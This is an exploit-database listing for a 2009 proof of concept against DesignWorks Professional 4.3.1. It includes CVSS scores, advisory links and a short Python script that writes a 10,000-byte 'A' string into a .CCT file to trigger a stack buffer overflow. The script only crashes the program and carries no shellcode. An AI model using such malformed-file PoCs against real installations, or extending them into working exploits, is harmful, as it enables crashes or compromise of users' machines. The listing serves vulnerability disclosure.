DesignWorks Professional 4.3.1 Local .CCT File Stack BOF PoC

2009.03.04
Credit: Cn4phux
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# # I'm Cn4phux # ------ | ______ _____ (--, __*__ ______ # |____| | ¤ | | | | ! ) | | | # [ | |` | | <> | |-----> |__/ | | ¤ | ] # | .. | |____! |____| |____ |\ | |-----| # | _| \ ----- | ::: | # | | \ # |_____| | \ # | # | # ,|. # / | \ # | | | # | _ | # `._\/.\/_,' # _( 8 )_ # / '_ _' \ # | /{_}\ | # ` | " | ` # | | # # # [+] Application : DesignWorks Professional 4.3.1 # # [+] Application's Description : (" DesignWorks Professional Schematic Capture for Windows...,Google-it.) # # [+] Bug : Local .CCT File Stack Buffer Overflow (PoC) # # [+] Author : Cn4phux # import sys import os print "[x] Local Stack Overflow PoC" try: milef = open("x2.cct",'w') except IOError, e: print "Unable to open file ", e sys.exit(0) print "[x] File sucessfully opened for writing." try: milef.write("A" * 10000) except IOError, e: print "Unable to write to file ", e sys.exit(0) print "[x] Exploit successfully written." milef.close() print "[x] ." print "\n[x] Cn4phux made in DZ, Great'z to all Algerians. /Google.dz"

References:

http://www.vupen.com/english/advisories/2008/3369
http://www.securityfocus.com/bid/32667
http://www.milw0rm.com/exploits/7362
http://secunia.com/advisories/33043


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top